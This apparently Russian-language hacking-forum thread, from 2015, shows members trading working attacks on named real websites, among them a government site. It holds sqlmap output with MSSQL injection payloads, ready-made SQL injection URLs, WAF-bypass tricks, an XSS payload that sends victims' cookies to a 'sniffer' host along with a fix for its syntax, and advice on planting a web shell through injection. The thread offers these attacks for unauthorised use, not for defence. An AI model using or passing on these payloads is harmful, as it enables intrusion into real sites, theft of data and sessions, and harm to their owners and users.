Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Сори ,надо сразу было выложить )

    Обычная ерор базед
    Вывод при -v 3

    [18:06:26] [PAYLOAD] bnzg=5979 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries
    Payload: http://www.igxe.com:80/Product/product.cfm?gameid=2338&sid=1;SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 2447*(SELECT 2447 FROM master..sys
    databases) END)--&curc=2&pid=3223&tid=1&deliverytype=3
    Vector: ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)--

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://www.igxe.com:80/Product/product.cfm?gameid=2338&sid=1 AND 2368=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(11
    3)+(SELECT (CASE WHEN (2368=2368) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)))&curc=2&pid=3223&tid=1&delivery
    type=3
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    ---
    [18:06:30] [INFO] the back-end DBMS is Microsoft SQL Server
    web application technology: ColdFusion
    back-end DBMS: Microsoft SQL Server 2008
    [18:06:30] [INFO] fetching tables for database: IGXEUSA
    [18:06:30] [PAYLOAD] 1 AND 2254=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(IGXEUSA..sysusers.name
    +CHAR(46)+IGXEUSA..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sysobjects INNER JOIN IGXEUSA..sysusers ON IGXEUSA..sysobjects.uid = IG
    XEUSA..sysusers.uid WHERE IGXEUSA..sysobjects.xtype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)))
    [18:06:31] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:31] [WARNING] the SQL query provided does not return any output
    [18:06:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [18:06:31] [PAYLOAD] 1 AND 7553=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(table_schema+CHAR(46)+
    table_name) AS NVARCHAR(4000)),CHAR(32)) FROM information_schema.tables WHERE table_catalog=CHAR(73)+CHAR(71)+CHAR(88)+CHAR(69)+CHAR(85)+CHAR(83)+CHAR
    (65))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)))
    [18:06:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:32] [WARNING] the SQL query provided does not return any output
    [18:06:32] [WARNING] the SQL query provided does not return any output
    [18:06:32] [INFO] fetching number of tables for database 'IGXEUSA'
    [18:06:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [18:06:32] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sys
    objects WHERE IGXEUSA..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) THEN 1 ELSE 8471*(SELECT 8471 FROM master..sysdatabases) END)--
    [18:06:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:33] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sys
    objects WHERE IGXEUSA..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>48) THEN 1 ELSE 8471*(SELECT 8471 FROM master..sysdatabases) END)--
    [18:06:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:34] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sys
    objects WHERE IGXEUSA..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>1) THEN 1 ELSE 8471*(SELECT 8471 FROM master..sysdatabases) END)--
    [18:06:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:36] [INFO] retrieved:
    [18:06:36] [DEBUG] performed 3 queries in 3.26 seconds
    [18:06:36] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(table_name))) AS NVARCHAR(4000)),CHAR(32)) FROM inform
    ation_schema.tables WHERE table_catalog=CHAR(73)+CHAR(71)+CHAR(88)+CHAR(69)+CHAR(85)+CHAR(83)+CHAR(65)),1,1))>51) THEN 1 ELSE 3827*(SELECT 3827 FROM m
    aster..sysdatabases) END)--
    [18:06:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:37] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(table_name))) AS NVARCHAR(4000)),CHAR(32)) FROM inform
    ation_schema.tables WHERE table_catalog=CHAR(73)+CHAR(71)+CHAR(88)+CHAR(69)+CHAR(85)+CHAR(83)+CHAR(65)),1,1))>48) THEN 1 ELSE 3827*(SELECT 3827 FROM m
    aster..sysdatabases) END)--
    [18:06:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:38] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(table_name))) AS NVARCHAR(4000)),CHAR(32)) FROM inform
    ation_schema.tables WHERE table_catalog=CHAR(73)+CHAR(71)+CHAR(88)+CHAR(69)+CHAR(85)+CHAR(83)+CHAR(65)),1,1))>1) THEN 1 ELSE 3827*(SELECT 3827 FROM ma
    ster..sysdatabases) END)--
    [18:06:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:39] [INFO] retrieved:
    [18:06:39] [DEBUG] performed 3 queries in 3.48 seconds
    [18:06:39] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sysobjects WHER
    E xtype = CHAR(85)),1,1))>51) THEN 1 ELSE 4817*(SELECT 4817 FROM master..sysdatabases) END)--
    [18:06:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:41] [WARNING] reflective value(s) found and filtering out
    [18:06:41] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sysobjects WHER
    E xtype = CHAR(85)),1,1))>48) THEN 1 ELSE 4817*(SELECT 4817 FROM master..sysdatabases) END)--
    [18:06:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:42] [PAYLOAD] 1;SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) FROM IGXEUSA..sysobjects WHER
    E xtype = CHAR(85)),1,1))>1) THEN 1 ELSE 4817*(SELECT 4817 FROM master..sysdatabases) END)--
    [18:06:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [18:06:44] [INFO] retrieved:
    [18:06:44] [DEBUG] performed 3 queries in 4.97 seconds
    [18:06:44] [WARNING] unable to retrieve the number of tables for database 'IGXEUSA'
    [18:06:44] [CRITICAL] unable to retrieve the tables for any database
    [18:06:44] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 11 times
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    так как там большинство таблиц с длинным именем, и чтобы их вытащить нужно пользоваться функцией CHAR(), получается довольно длинный GET запрос. например, таблица NEWGXE_AppraisePersonComment:
    Code:
    http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>CHAR(78)%2bCHAR(69)%2bCHAR(87)%2bCHAR(71)%2bCHAR(88)%2bCHAR(69)%2bCHAR(95)%2bCHAR(65)%2bCHAR(112)%2bCHAR(112)%2bCHAR(114)%2bCHAR(97)%2bCHAR(105)%2bCHAR(115)%2bCHAR(101)%2bCHAR(80)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115)%2bCHAR(111)%2bCHAR(110)%2bCHAR(67)%2bCHAR(111)%2bCHAR(109)%2bCHAR(109)%2bCHAR(101)%2bCHAR(110)%2bCHAR(116))--&curc=2&pid=3223&tid=1&delivery%20type=3
    вываливается то 500 ошибка, то Security: The requested template has been denied access

    но если есть желание покрутить руками, то вот:
    Code:
    http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+WHERE+table_name+like+(SELECT+TOP+1+table_name+FROM+information_schema.tables+WHERE+table_name+not+in+(SELECT+TOP+1+table_name+FROM+information_schema.tables)))--&pid=3223
    или так:
    Code:
    http://www.igxe.com/Product/product.cfm?gameid=2338&sid=1+or+1=(SeLect+max(table_name)+from+(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+2+table_name+from+information_schema.tables+order+by+table_name)+order+by+table_name)a)--&pid=3223
    больше информации: https://rdot.org/forum/showthread.php?t=826
     
    _________________________
    #22 yarbabin, 5 May 2015
    Last edited: 5 May 2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://compassrecords.com/xml/songlist.xml.php?id=888%27+div+0+/*!12345union*/+/*!select*/+1,2,3,4,5,6,VERSION/*!12345()*/,8,9,10,11,12,13,14,15--+
    жесткий WAF, пока не придумал, как обойти на FROM
     
    _________________________
    Br@!ns likes this.
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    фильтрует его WAF, запрещает использовать в юзер-агенте эти символы: <?
    однако в реферере все отлично пускает:
    [​IMG]
     
    _________________________
  5. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть пассивная XSS, читаем куки "><script>alert(document.cookie)</script> - без вопросов, но когда я подставляю сниффер - куки не приходят.
    http://site.ru/?="><script>(new+image()).src="sniffer.url"document.cookie</script>уже ажрес сниффер через ЧарКод пропускал - нефига ..
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нефига, потому что синтаксис кривой: <script>(new image()).src="sniffer.url"+document.cookie</script>
    там должен быть реальный плюс, если это гет параметр, то нужно его заурленкодить, то есть %2b. а между new Image (Image с большой буквы) должен быть реальный пробел, то есть %20
     
    _________________________
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    как можно заменить в функции /*!12345select*/ знаки '/' и '*', как вообще работает это все?
    И еще один вопрос. Можно ли использовть запрос в подзапросе вида: select user_id from(select table_name from information_schema.tables limit 48,1), в целях обхода на фильтр слова в url строке?
     
    #27 Br@!ns, 8 May 2015
    Last edited: 8 May 2015
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это комментарии в mysql. работает потому что есть символ воскл. знака.
    тут можно посмотреть еще на возможные варианты: http://websec.ca/kb/sql_injection#MySQL_Specific_Code
     
    _________________________
    Br@!ns likes this.
  9. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Собственно вопрос, имеется сайт:
    Выдает:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 6
    Не получается раскрутить sql-injection, есть варианты?
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    :)
    Code:
    http://old.metallprofil.ru/e_mag/'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)='1
     
    _________________________
  11. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    а как заставить sqlmap пробить?
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    боюсь, что никак. у вас там не много запросов получится, если выводить с group_concat()
     
    _________________________
  13. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    если посмотрела все таблицы этой бд и не нашла то наверно ее просто нет, если есть другие бд посмотри их
     
  14. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.theatremunicipal-tunis.gov.tn/fiche_spectacle.php?id=53
    Полей вроде 6-ть, а дальше чей-то ни как...
     
  15. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Code:
    http://www.theatremunicipal-tunis.gov.tn/fiche_spectacle.php?id=54 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
     
    #35 teh, 10 May 2015
    Last edited: 11 May 2015
  16. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Есть сайт где в случае использование union, либо select в sqli вылезает 403 ошибка.
    Иногда помогает замена на /*!uNIoN*/+/*!SElECT*/
    Вопрос такой: если работает указанная конструкция на некотором сайте - будет ли работать она там же где работает обычный union select?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    да. это синтаксис mysql
     
    _________________________
  18. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Посоветуйте эксплойты для удаленного выполнения, а то пробыю и под Apache и ProFTPD ничего не выходит((
    Code:
    Not shown: 997 filtered ports
    PORT  STATE SERVICE VERSION
    21/tcp  open  ftp  ProFTPD 1.3.3
    80/tcp  open  http  Apache httpd 2.2.15 ((Mandriva Linux/PREFORK-3mdv2010.1))
    2222/tcp open  ssh  OpenSSH 5.5 (protocol 2.0)
    Service Info: OS: Unix
    
    И попутно какие есть уязвимости в yii frameworke 1.1.13?
     
  19. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Реально ли залить шелл через sqli file_priv = y, если она имеет тип error_based, либо blind. имеется ввиду не приводя инъекцию к обычному union виду
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Для Error-Based есть такой вектор:

    Для Union Based заливаете как есть, несмотря на отсутствие вывода. Проверяете залился ли файл командами

    select if(load_file('/tmp/shell.php') is not null,1,2)=1 TRUE Файл существут
    select if(load_file('/tmp/shell.php') is not null,1,2)=1 FALSE Файла нет
     
    _________________________